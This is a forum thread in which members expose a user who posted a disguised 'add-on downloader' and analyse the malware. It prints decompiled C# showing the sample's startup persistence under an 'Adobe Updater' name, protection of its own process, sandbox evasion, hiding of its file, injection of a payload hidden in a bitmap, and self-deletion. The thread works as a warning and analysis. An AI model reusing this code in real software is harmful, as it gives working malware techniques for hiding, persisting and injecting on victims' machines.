kyle1836 (ID 5289) - Distributing monetized viruses on BLF

[Ipquarx]

Here's the topic.

If you look at the virus scan link, it's actually a monetized link. Don't click it. It will give him money. You don't want that.

I downloaded the file, and mozilla firefox quickly told me it was malicious. I opened up the file in ILSpy. Here are some snippets from the code:

Code: [Select]

private class Persistence
{
private delegate bool g(IntPtr a, int b, [Out] byte[] c, uint d, out uint e);
private delegate bool s(IntPtr a, int b, [In] byte[] c);
private static string reverseStr(string inputStr)
{
char[] array = inputStr.ToCharArray();
Array.Reverse(array);
return new string(array);
}
private static void AddToStartup()
{
try
{
File.WriteAllText(
Path.Combine(
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
"forgetyounod32.vbs"),
string.Format(
"CreateObject(\"WScript.Shell\").RegWrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\{0}\",\"{1}\",\"REG_SZ\"",
"Adobe Updater",
Process.GetCurrentProcess().MainModule.FileName)
);

using (Process process = Process.Start(new ProcessStartInfo(Program.Persistence.reverseStr("exe.dmc"))
{
UseShellExecute = false,
RedirectStandardOutput = true,
RedirectStandardInput = true,
CreateNoWindow = true
}))
{
process.EnableRaisingEvents = true;
process.StandardInput.WriteLine(string.Format("cd \"{0}\"", Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)));
process.StandardInput.WriteLine("forgetyounod32.vbs");
process.StandardInput.WriteLine("exit");
process.WaitForExit();
}
}
catch
{
}
}
public static void checkStartup()
{
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
if ((string)registryKey.GetValue("Adobe Updater", "(byte)113EFBEEF") != Process.GetCurrentProcess().MainModule.FileName)
{
Program.Persistence.AddToStartup();
}
registryKey.Close();
}
catch
{
}
}
public static void ProtectProcess(object[] processData)
{
try
{
IntPtr a = (IntPtr)processData[0];
Program.api api = (Program.api)processData[1];
byte[] array = new byte[0];
Program.Persistence.g g = api.create<Program.Persistence.g>("advapi32", "GetKernelObjectSecurity");
uint num;
g(a, 4, array, 0u, out num);
if (num >= 0u && (ulong)num <= 32767uL)
{
if (g(a, 4, array = new byte[num], num, out num))
{
RawSecurityDescriptor rawSecurityDescriptor = new RawSecurityDescriptor(array, 0);
rawSecurityDescriptor.DiscretionaryAcl.InsertAce(0, new CommonAce(AceFlags.None, AceQualifier.AccessDenied, 2035711, new SecurityIdentifier(WellKnownSidType.WorldSid, null), false, null));
byte[] array2 = new byte[rawSecurityDescriptor.BinaryLength];
rawSecurityDescriptor.GetBinaryForm(array2, 0);
api.create<Program.Persistence.s>("advapi32", "SetKernelObjectSecurity")(a, 4, array2);
}
}
}
catch
{
}
}
public static void HideFile()
{
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Program.Persistence.reverseStr("decnavdA\\rerolpxE\\noisreVtnerruC\\swodniW\\tfosorciM\\ERAWTFOS"), true);
registryKey.SetValue(Program.Persistence.reverseStr("neddiH"), "0", RegistryValueKind.DWord);
registryKey.Close();
File.SetAttributes(Process.GetCurrentProcess().Modules[0].FileName, FileAttributes.Hidden);
}
catch
{
}
}
}


Code: [Select]

private static void Main(string[] args)
{
ProcessModuleCollection modules = Process.GetCurrentProcess().Modules;
foreach (ProcessModule processModule in modules)
{
if (processModule.ModuleName.ToLower().Contains("sbiedll.dll"))
{
Environment.Exit(8);
}
}
bool flag = true;
new Mutex(true, "YagbNWREZNEj", ref flag);
if (!flag)
{
Environment.Exit(Environment.ExitCode);
}
int num = args.Length;
object[] array = new object[]
{
Assembly.GetExecutingAssembly()
};
array[num] = ((Assembly)array[num]).GetManifestResourceStream(((Assembly)array[num]).GetManifestResourceNames()[num]);
array[num] = new Bitmap((Stream)array[num]);
array[num] = Program.reverse((Bitmap)array[num], int.Parse("13359"));
array[num] = Program.crypt((byte[])array[num]);
array[num] = Program.decompress((byte[])array[num]);
array = Program.inj.run((byte[])array[num], null, Path.Combine(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "Microsoft.NET\\Framework\\v2.0.50727").ToLower().Replace("\\system32", ""), "CasPol.exe"));
Program.Persistence.ProtectProcess(array);
Program.Persistence.checkStartup();
Program.Persistence.HideFile();
Process.Start(new ProcessStartInfo
{
CreateNoWindow = true,
Arguments = " /C ping 127.0.0.1 -n 3 > nul & del \"" + Process.GetCurrentProcess().Modules[num].FileName + "\"",
FileName = "cmd.exe",
WindowStyle = ProcessWindowStyle.Hidden
});
Environment.Exit(Environment.ExitCode);
}Now if you don't know coding, I don't blame you. So, here's what it's doing.

First, it runs an executable that's in the form of a bitmap file that's saved within the exe itself. We have no idea what this executable does, and the only possible use of this form of obfuscation is to hide malicious code. It probably saves a copy of ui.

Second, it adds itself to the startup list in the form of an adobe product updater. That's probably how the exe hides itself. Every time you start up your computer and log on, that unknown program runs.

Third, it deletes itself.

Fourth, he loving monitized the virus scan link. Need I say more?

[Ad Bot]

[DJ Charizard]

I love reading code that looks like it's size 4 font.

OT: /fullsupport Guy is a scumbag.

[Crazycom]

Although it's not that important now, I'd like to point out that the file does not delete itself - it makes itself hidden and I believe it also turns off the computer's ability to show hidden files/folders (in which you must re-enable it again manually).

He also has a recent (May 2015) forum profile on another forum related to Bitcoin monetizing or the similar.

/support

also, lol:



why?

[Ipquarx]

Noedit: i made a small mistake in the OP.

First, it runs an executable that's in the form of a bitmap file that's saved within the exe itself. We have no idea what this executable does, and the only possible use of this form of obfuscation is to hide malicious code. It probably saves a copy of itself in the appdata folder.

Although it's not that important now, I'd like to point out that the file does not delete itself - it makes itself hidden and I believe it also turns off the computer's ability to show hidden files/folders (in which you must re-enable it again manually).

It turns off the computers ability to see hidden files and it at least deletes something, as can be seen here:
Arguments = " /C ping 127.0.0.1 -n 3 > nul & del \"" + Process.GetCurrentProcess().Modules[num].FileName + "\"",

That might be the program itself and it might be the program it creates using the bitmap saved inside the executable. I haven't spent a ton of time brown townyzing the code.

[Slammer1337]

^^something related probably but i'm not too sure??

[MoltenKitten]

Topic locked and it is in gallery. He really must think our IQ is that of a baby to think we would download.

[Slammer1337]

the red flag was the fact that he provided a virus scan link lol. this guy forgeted up too hard.

[Nal]

6:44 PM - nal: did you double click it when you opened it
6:44 PM - nal: because when i did it just redirected me to the dl page
6:45 PM - Ipquarx: cur.lv is literally a website called "CoinURL"
6:45 PM - Ipquarx: "The smart way to monetize your content!"
6:45 PM - nal: again
6:46 PM - nal: i downloaded it to do a virus total scan
6:46 PM - Ipquarx: the virus scan is monetized
6:46 PM - Ipquarx: not the download link
6:46 PM - nal: and double clicked it by accident
6:46 PM - nal: where it says its blocked
6:46 PM - nal: did it require uac
6:47 PM - Ipquarx: wait
6:47 PM - Ipquarx: are you saying you ran it
6:47 PM - nal: no
6:47 PM - nal: im saying i think i did
6:47 PM - nal: by accident
6:47 PM - nal: i knew it was fake
6:47 PM - Ipquarx: it requires admin priviledges
6:47 PM - nal: okay then im fine
6:47 PM - nal: i didnt get a prompt for it and i have uac enabled + did a virus scan


just posting this here, for anyone that happens to have this issue, it required UAC

[Crazycom]

^^something related probably but i'm not too sure??

Ironically..



Although it is starting to get a little far fetched.

That might be the program itself and it might be the program it creates using the bitmap saved inside the executable. I haven't spent a ton of time brown townyzing the code.

Very curious to find out what this file does exactly.
Running the file came up with nothing but this on a virtual machine running Windows XP SP3:



Probably the fact that it's XP, but still.

[Nal]

gonna try it on windows 10

[QuadStorm]

/support, just by looking at the thread and file name gave red flags everywhere including no screenshots of the "program" (which very clearly never existed). An "add-on downloader"...seriously they couldn't think up of any other thing that would've made more sense/more convincing, considering I never have trouble downloading add-ons, not to mention there are plenty of legitimate sources of add-ons and packs; point it's blatantly obvious that it's malicious.

[Nal]

this is the startup process

%appdata%

[Space1255]

/support. It's also pretty sketchy that he isn't trying to defend himself in this thread.

[DJ Charizard]

/support. It's also pretty sketchy that he isn't trying to defend himself in this thread.

Probably better for him not to post. He's already dug himself a deep enough grave.

[Space1255]

Probably better for him not to post. He's already dug himself a deep enough grave.

Fair point, but if he is stupid enough to think that we will download anything with zero explanation, he'd put up a fight, speaking from experience See: me defending myself in every drama about me ever.